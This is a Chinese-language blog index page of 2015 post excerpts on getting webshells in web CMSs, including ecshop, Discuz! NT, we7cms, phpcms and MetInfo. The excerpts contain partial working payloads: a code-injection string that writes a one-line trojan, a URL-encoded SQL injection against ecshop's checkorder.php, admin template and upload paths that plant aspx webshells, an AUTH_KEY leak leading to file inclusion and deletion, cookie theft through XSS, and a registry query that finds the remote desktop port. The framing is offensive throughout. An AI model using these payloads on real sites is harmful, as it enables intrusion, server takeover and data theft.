2015年10月18日
ecshop v2.7.3之webshell篇(4种方法)
摘要: 0X01 拿webshell。登陆后发现只有一个语言编辑权利,但这正是我们为了拿webshell分配的,已经足够了。 由于将变量直接写入user.php文件并且没有对变量过滤,导致可以插入代码并执行。 查找用户信息 在用户信息后面添加生成一句话木马的代码 ${${fputs(fopen(base64 阅读全文
posted @ 2015-10-18 13:05 小生观察室 阅读(278) 评论(0) 推荐(0)
ecshop 注入漏洞 利用方法&EXP
摘要: 注入:购物车中一定需要有物品!!! 登陆目标网站,注册,选任意一件商品加入到购物车,然后结算,将下面的代码保存为html就可以注入了 <form name="form1" method="post"> ECSHOP通版本注入漏洞 简单EXP [ Silic Group Hacker Army ]<i 阅读全文
posted @ 2015-10-18 12:42 小生观察室 阅读(218) 评论(0) 推荐(0)
2015年10月17日
ecshop 通杀2.6*2.7 GBK版本 0DAY修改版
摘要: http://localhost/ecshop/api/checkorder.php?username=%ce%27%20and%201=2%20union%20select%201%20and%20%28select%201%20from%28select%20count%28*%29,conca 阅读全文
posted @ 2015-10-17 21:53 小生观察室 阅读(38) 评论(0) 推荐(0)
2015年10月12日
Discuz! NT 3.1.0 后台拿webshell
摘要: 简要描述: 通过后台写入aspx木马,直接拿到webshell,然后获取整个服务器权限。 详细说明: 1、访问http://127.0.0.1/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templa 阅读全文
posted @ 2015-10-12 10:07 小生观察室 阅读(486) 评论(0) 推荐(0)
2015年10月9日
we7cms后台上传webshel(续)
摘要: 简要描述: 又看了下,上传的漏洞远还真不少,只要进入后台,就能上传webshell,用这个cms的政府网站要小心鸟 详细说明: 1,最直接的文件管理没有做任何上传的限制,可直接上传webshell.2,上次说的那个www.xx.com/admin/Folder.aspx?noSelect=0&fol 阅读全文
posted @ 2015-10-09 11:08 小生观察室 阅读(227) 评论(0) 推荐(0)
we7cmd后台上传webshell
摘要: admin/Folder.aspx.cs中 ... string Filter { get { string f = Request["filter"]; if (f == null) { f = "*"; } return f; } } … void LoadFiles() { //if (Sel 阅读全文
posted @ 2015-10-09 11:07 小生观察室 阅读(229) 评论(0) 推荐(0)
phpcms的另一个phpcms_auth函数的加密密钥AUTH_KEY泄漏漏洞
摘要: phpcms的另一个phpcms_auth函数的加密密钥AUTH_KEY泄漏漏洞phpcms的phpcms_auth函数的加密密钥AUTH_KEY泄漏会导致本地包含任意文件下载等多个漏洞。而对phpcms2008有的本地包含又可以导致直接写shell和删除文件。所以泄漏了phpcms的phpcms_ 阅读全文
posted @ 2015-10-09 10:42 小生观察室 阅读(2588) 评论(0) 推荐(0)
phpcms本地包含漏洞导致的写shell漏洞和删除任意文件漏洞
摘要: phpcms本地包含类漏洞,如果该文件包含了/include/common.inc.php就可以包含执行很多后台才能执行的文件了。由于phpcms的全局变量机制,导致能拿shell的方法很多,类似的问题不止一个。admin/safe.inc.php文件是后台扫木马的程序,但是很可惜的是虽然文件名叫做 阅读全文
posted @ 2015-10-09 10:33 小生观察室 阅读(2037) 评论(0) 推荐(0)
2015年10月7日
Net/Net1禁止情况下查找远程端口-bat技巧
摘要: 找远程端口 先建立一个bat,因为这个命令断断续续 会出现错误 建立一个bat就搞定了查看终端命令:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber  阅读全文
posted @ 2015-10-07 21:29 小生观察室 阅读(92) 评论(0) 推荐(0)
2015年9月30日
MetInfo4.0后台拿shell
摘要: 首先 利用方法,在线留言处: 名字填写: Noevil 内容:随意。 后台管理员查看留言列表,自动截取Cookie,NoXss会努力的去Keep Session 不一定非得这样拿到管理员权限、、(方法很多,不多介绍) 重点: 登陆后台拿Shell: 添加模板,上传Zip,Zip里的东西会自动解压到 阅读全文
posted @ 2015-09-30 22:33 小生观察室 阅读(144) 评论(0) 推荐(0)